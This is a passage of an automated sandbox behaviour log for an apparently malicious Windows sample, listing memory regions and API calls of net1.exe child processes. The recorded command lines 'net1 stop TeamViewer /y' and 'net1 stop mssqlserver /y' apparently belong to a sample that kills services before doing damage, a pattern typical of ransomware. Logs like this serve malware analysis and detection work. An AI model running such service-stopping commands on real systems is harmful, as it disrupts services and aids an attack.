"private_0x000000007ffe0000" filename = "" Region: id = 1284 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1285 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1286 start_va = 0x7ff6fccc0000 end_va = 0x7ff6fccfbfff monitored = 1 entry_point = 0x7ff6fccc5190 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 1287 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1318 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1319 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1320 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1321 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1322 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1323 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1342 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1343 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1344 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1345 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1346 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1347 start_va = 0x7ff875a10000 end_va = 0x7ff875a28fff monitored = 0 entry_point = 0x7ff875a14520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1348 start_va = 0x7ff87b9d0000 end_va = 0x7ff87b9dbfff monitored = 0 entry_point = 0x7ff87b9d27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1349 start_va = 0x7ff8786a0000 end_va = 0x7ff8786a9fff monitored = 0 entry_point = 0x7ff8786a1660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1350 start_va = 0x7ff86d070000 end_va = 0x7ff86d095fff monitored = 0 entry_point = 0x7ff86d071cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1351 start_va = 0x7ff875230000 end_va = 0x7ff875245fff monitored = 0 entry_point = 0x7ff875231b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1352 start_va = 0x7ff878510000 end_va = 0x7ff87854dfff monitored = 0 entry_point = 0x7ff87851a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1353 start_va = 0x7ff87c060000 end_va = 0x7ff87c06afff monitored = 0 entry_point = 0x7ff87c0619a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1354 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1355 start_va = 0x7ff861250000 end_va = 0x7ff861263fff monitored = 0 entry_point = 0x7ff861251310 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 1356 start_va = 0x7ff87c450000 end_va = 0x7ff87c478fff monitored = 0 entry_point = 0x7ff87c464530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1358 start_va = 0x480000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1359 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1388 start_va = 0x1d0000 end_va = 0x1d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 56 os_tid = 0x1194 [0139.846] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff6fccc0000 [0139.846] __set_app_type (_Type=0x1) [0139.846] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff6fccc54b0) returned 0x0 [0139.846] __getmainargs (in: _Argc=0x7ff6fcceac88, _Argv=0x7ff6fcceac90, _Env=0x7ff6fcceac98, _DoWildCard=0, _StartInfo=0x7ff6fcceaca4 | out: _Argc=0x7ff6fcceac88, _Argv=0x7ff6fcceac90, _Env=0x7ff6fcceac98) returned 0 [0139.846] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.847] GetConsoleOutputCP () returned 0x1b5 [0139.908] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6fccf2a20 | out: lpCPInfo=0x7ff6fccf2a20) returned 1 [0139.908] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.946] sprintf_s (in: _DstBuf=0xcfc70, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0139.946] setlocale (category=0, locale=".437") returned="English_United States.437" [0139.948] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0139.948] GetStdHandle (nStdHandle=0xfffffff4) returned 0x28 [0139.948] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TeamViewer /y" [0139.948] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcfcd0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0139.948] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x78) returned 0x5c86b0 [0139.949] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0139.949] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfc58 | out: Buffer=0xcfc58*=0x5c9190) returned 0x0 [0139.949] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfc60 | out: Buffer=0xcfc60*=0x5c85e0) returned 0x0 [0139.949] __iob_func () returned 0x7ff87fe6e210 [0139.949] _fileno (_File=0x7ff87fe6e210) returned 0 [0139.949] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0139.949] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0139.950] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0139.950] _wcsicmp (_String1="config", _String2="stop") returned -16 [0139.950] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0139.950] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0139.950] _wcsicmp (_String1="file", _String2="stop") returned -13 [0139.950] _wcsicmp (_String1="files", _String2="stop") returned -13 [0139.950] _wcsicmp (_String1="group", _String2="stop") returned -12 [0139.950] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0139.950] _wcsicmp (_String1="help", _String2="stop") returned -11 [0139.950] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0139.950] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0139.950] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0139.950] _wcsicmp (_String1="session", _String2="stop") returned -15 [0139.950] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0139.950] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0139.950] _wcsicmp (_String1="share", _String2="stop") returned -12 [0139.950] _wcsicmp (_String1="start", _String2="stop") returned -14 [0139.950] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0139.950] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0139.950] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0139.950] _wcsicmp (_String1="accounts", _String2="TeamViewer") returned -19 [0139.950] _wcsicmp (_String1="computer", _String2="TeamViewer") returned -17 [0139.950] _wcsicmp (_String1="config", _String2="TeamViewer") returned -17 [0139.950] _wcsicmp (_String1="continue", _String2="TeamViewer") returned -17 [0139.950] _wcsicmp (_String1="cont", _String2="TeamViewer") returned -17 [0139.950] _wcsicmp (_String1="file", _String2="TeamViewer") returned -14 [0139.950] _wcsicmp (_String1="files", _String2="TeamViewer") returned -14 [0139.950] _wcsicmp (_String1="group", _String2="TeamViewer") returned -13 [0139.950] _wcsicmp (_String1="groups", _String2="TeamViewer") returned -13 [0139.950] _wcsicmp (_String1="help", _String2="TeamViewer") returned -12 [0139.950] _wcsicmp (_String1="helpmsg", _String2="TeamViewer") returned -12 [0139.950] _wcsicmp (_String1="localgroup", _String2="TeamViewer") returned -8 [0139.950] _wcsicmp (_String1="pause", _String2="TeamViewer") returned -4 [0139.951] _wcsicmp (_String1="session", _String2="TeamViewer") returned -1 [0139.951] _wcsicmp (_String1="sessions", _String2="TeamViewer") returned -1 [0139.951] _wcsicmp (_String1="sess", _String2="TeamViewer") returned -1 [0139.951] _wcsicmp (_String1="share", _String2="TeamViewer") returned -1 [0139.951] _wcsicmp (_String1="start", _String2="TeamViewer") returned -1 [0139.951] _wcsicmp (_String1="stats", _String2="TeamViewer") returned -1 [0139.951] _wcsicmp (_String1="statistics", _String2="TeamViewer") returned -1 [0139.951] _wcsicmp (_String1="stop", _String2="TeamViewer") returned -1 [0139.951] _wcsicmp (_String1="time", _String2="TeamViewer") returned 4 [0139.951] _wcsicmp (_String1="user", _String2="TeamViewer") returned 1 [0139.951] _wcsicmp (_String1="users", _String2="TeamViewer") returned 1 [0139.951] _wcsicmp (_String1="msg", _String2="TeamViewer") returned -7 [0139.951] _wcsicmp (_String1="messenger", _String2="TeamViewer") returned -7 [0139.951] _wcsicmp (_String1="receiver", _String2="TeamViewer") returned -2 [0139.951] _wcsicmp (_String1="rcv", _String2="TeamViewer") returned -2 [0139.951] _wcsicmp (_String1="netpopup", _String2="TeamViewer") returned -6 [0139.951] _wcsicmp (_String1="redirector", _String2="TeamViewer") returned -2 [0139.951] _wcsicmp (_String1="redir", _String2="TeamViewer") returned -2 [0139.951] _wcsicmp (_String1="rdr", _String2="TeamViewer") returned -2 [0139.951] _wcsicmp (_String1="workstation", _String2="TeamViewer") returned 3 [0139.952] _wcsicmp (_String1="work", _String2="TeamViewer") returned 3 [0139.952] _wcsicmp (_String1="wksta", _String2="TeamViewer") returned 3 [0139.952] _wcsicmp (_String1="prdr", _String2="TeamViewer") returned -4 [0139.952] _wcsicmp (_String1="devrdr", _String2="TeamViewer") returned -16 [0139.952] _wcsicmp (_String1="lanmanworkstation", _String2="TeamViewer") returned -8 [0139.952] _wcsicmp (_String1="server", _String2="TeamViewer") returned -1 [0139.952] _wcsicmp (_String1="svr", _String2="TeamViewer") returned -1 [0139.952] _wcsicmp (_String1="srv", _String2="TeamViewer") returned -1 [0139.952] _wcsicmp (_String1="lanmanserver", _String2="TeamViewer") returned -8 [0139.952] _wcsicmp (_String1="alerter", _String2="TeamViewer") returned -19 [0139.952] _wcsicmp (_String1="netlogon", _String2="TeamViewer") returned -6 [0139.952] _wcsupr (in: _String="TeamViewer" | out: _String="TEAMVIEWER") returned="TEAMVIEWER" [0139.952] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5cde80 [0139.962] GetServiceKeyNameW (in: hSCManager=0x5cde80, lpDisplayName="TEAMVIEWER", lpServiceName=0x7ff6fccf4b10, lpcchBuffer=0xcfb90 | out: lpServiceName="", lpcchBuffer=0xcfb90) returned 0 [0144.518] _wcsicmp (_String1="msg", _String2="TEAMVIEWER") returned -7 [0144.519] _wcsicmp (_String1="messenger", _String2="TEAMVIEWER") returned -7 [0144.519] _wcsicmp (_String1="receiver", _String2="TEAMVIEWER") returned -2 [0144.519] _wcsicmp (_String1="rcv", _String2="TEAMVIEWER") returned -2 [0144.519] _wcsicmp (_String1="redirector", _String2="TEAMVIEWER") returned -2 [0144.519] _wcsicmp (_String1="redir", _String2="TEAMVIEWER") returned -2 [0144.519] _wcsicmp (_String1="rdr", _String2="TEAMVIEWER") returned -2 [0144.519] _wcsicmp (_String1="workstation", _String2="TEAMVIEWER") returned 3 [0144.519] _wcsicmp (_String1="work", _String2="TEAMVIEWER") returned 3 [0144.519] _wcsicmp (_String1="wksta", _String2="TEAMVIEWER") returned 3 [0144.519] _wcsicmp (_String1="prdr", _String2="TEAMVIEWER") returned -4 [0144.519] _wcsicmp (_String1="devrdr", _String2="TEAMVIEWER") returned -16 [0144.519] _wcsicmp (_String1="lanmanworkstation", _String2="TEAMVIEWER") returned -8 [0144.519] _wcsicmp (_String1="server", _String2="TEAMVIEWER") returned -1 [0144.519] _wcsicmp (_String1="svr", _String2="TEAMVIEWER") returned -1 [0144.519] _wcsicmp (_String1="srv", _String2="TEAMVIEWER") returned -1 [0144.519] _wcsicmp (_String1="lanmanserver", _String2="TEAMVIEWER") returned -8 [0144.519] _wcsicmp (_String1="alerter", _String2="TEAMVIEWER") returned -19 [0144.519] _wcsicmp (_String1="netlogon", _String2="TEAMVIEWER") returned -6 [0144.519] _wcsicmp (_String1="TEAMVIEWER", _String2="WORKSTATION") returned -3 [0144.519] _wcsicmp (_String1="TEAMVIEWER", _String2="LanmanWorkstation") returned 8 [0144.519] _wcsicmp (_String1="TEAMVIEWER", _String2="SERVER") returned 1 [0144.519] _wcsicmp (_String1="TEAMVIEWER", _String2="LanmanServer") returned 8 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="BROWSER") returned 18 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="BROWSER") returned 18 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="MESSENGER") returned 7 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="MESSENGER") returned 7 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="NETRUN") returned 6 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="NETRUN") returned 6 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="SPOOLER") returned 1 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="SPOOLER") returned 1 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="ALERTER") returned 19 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="ALERTER") returned 19 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="NETLOGON") returned 6 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="NETLOGON") returned 6 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="NETPOPUP") returned 6 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="NETPOPUP") returned 6 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="SQLSERVER") returned 1 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="SQLSERVER") returned 1 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="REPLICATOR") returned 2 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="REPLICATOR") returned 2 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="REMOTEBOOT") returned 2 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="REMOTEBOOT") returned 2 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="TIMESOURCE") returned -4 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="TIMESOURCE") returned -4 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="AFP") returned 19 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="AFP") returned 19 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="UPS") returned -1 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="UPS") returned -1 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="XACTSRV") returned -4 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="XACTSRV") returned -4 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="TCPIP") returned 2 [0144.520] _wcsicmp (_String1="TEAMVIEWER", _String2="TCPIP") returned 2 [0144.520] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5cda60 [0144.522] OpenServiceW (hSCManager=0x5cda60, lpServiceName="TEAMVIEWER", dwDesiredAccess=0x84) returned 0x0 [0144.525] GetLastError () returned 0x424 [0144.525] CloseServiceHandle (hSCObject=0x5cda60) returned 1 [0144.531] wcscmp (_String1="NETMSG", _String2="BASE") returned 1 [0144.531] wcscpy_s (in: _Destination=0x7ff6fccf34e0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0144.531] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0x1d0002 [0144.535] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x1d0002, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x7ff6fccf3b00, nSize=0x800, Arguments=0x7ff6fccf3260 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0145.170] GetFileType (hFile=0x28) returned 0x2 [0145.170] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcf98c | out: lpMode=0xcf98c) returned 1 [0145.486] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x7ff6fccf3b00*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcf980, lpReserved=0x0 | out: lpBuffer=0x7ff6fccf3b00*, lpNumberOfCharsWritten=0xcf980*=0x1e) returned 1 [0145.826] GetFileType (hFile=0x28) returned 0x2 [0145.826] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcf98c | out: lpMode=0xcf98c) returned 1 [0145.995] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x7ff6fcce0a84*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf980, lpReserved=0x0 | out: lpBuffer=0x7ff6fcce0a84*, lpNumberOfCharsWritten=0xcf980*=0x2) returned 1 [0146.161] _ultow (in: _Dest=0x889, _Radix=850336 | out: _Dest=0x889) returned="2185" [0146.161] wcscmp (_String1="NETMSG", _String2="BASE") returned 1 [0146.161] FormatMessageW (in: dwFlags=0x2800, lpSource=0x1d0002, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x7ff6fccf3b00, nSize=0x800, Arguments=0x7ff6fccf3260 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0146.161] GetFileType (hFile=0x28) returned 0x2 [0146.161] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcf938 | out: lpMode=0xcf938) returned 1 [0146.219] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x7ff6fccf3b00*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xcf930, lpReserved=0x0 | out: lpBuffer=0x7ff6fccf3b00*, lpNumberOfCharsWritten=0xcf930*=0x34) returned 1 [0146.244] GetFileType (hFile=0x28) returned 0x2 [0146.244] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcf938 | out: lpMode=0xcf938) returned 1 [0146.369] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x7ff6fcce0a84*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf930, lpReserved=0x0 | out: lpBuffer=0x7ff6fcce0a84*, lpNumberOfCharsWritten=0xcf930*=0x2) returned 1 [0146.547] NetApiBufferFree (Buffer=0x5c9190) returned 0x0 [0146.547] NetApiBufferFree (Buffer=0x5c85e0) returned 0x0 [0146.547] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TeamViewer /y" [0146.547] exit (_Code=2) Thread: id = 59 os_tid = 0x88c Process: id = "17" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x479de000" os_pid = "0xac0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x62c" cmd_line = "C:\\Windows\\system32\\net1 stop mssqlserver /y" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1300 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1301 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1302 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1303 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1304 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1305 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1306 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1307 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1308 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1309 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1310 start_va = 0x7ff6fccc0000 end_va = 0x7ff6fccfbfff monitored = 1 entry_point = 0x7ff6fccc5190 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 1311 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1312 start_va = 0x100000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1313 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1314 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1315 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1316 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1317 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1324 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1325 start_va = 0x4c0000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1326 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1327 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1328 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1329 start_va = 0x7ff875a10000 end_va = 0x7ff875a28fff monitored = 0 entry_point = 0x7ff875a14520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1330 start_va = 0x7ff87b9d0000 end_va = 0x7ff87b9dbfff monitored = 0 entry_point = 0x7ff87b9d27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1331 start_va = 0x7ff8786a0000 end_va = 0x7ff8786a9fff monitored = 0 entry_point = 0x7ff8786a1660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1332 start_va = 0x7ff86d070000 end_va = 0x7ff86d095fff monitored = 0 entry_point = 0x7ff86d071cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1333 start_va = 0x7ff875230000 end_va = 0x7ff875245fff monitored = 0 entry_point = 0x7ff875231b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1334 start_va = 0x7ff878510000 end_va = 0x7ff87854dfff monitored = 0 entry_point = 0x7ff87851a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1335 start_va = 0x7ff861250000 end_va = 0x7ff861263fff monitored = 0 entry_point = 0x7ff861251310 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 1336 start_va = 0x7ff87c060000 end_va = 0x7ff87c06afff monitored = 0 entry_point = 0x7ff87c0619a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1337 start_va = 0x7ff87c450000 end_va = 0x7ff87c478fff monitored = 0 entry_point = 0x7ff87c464530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" 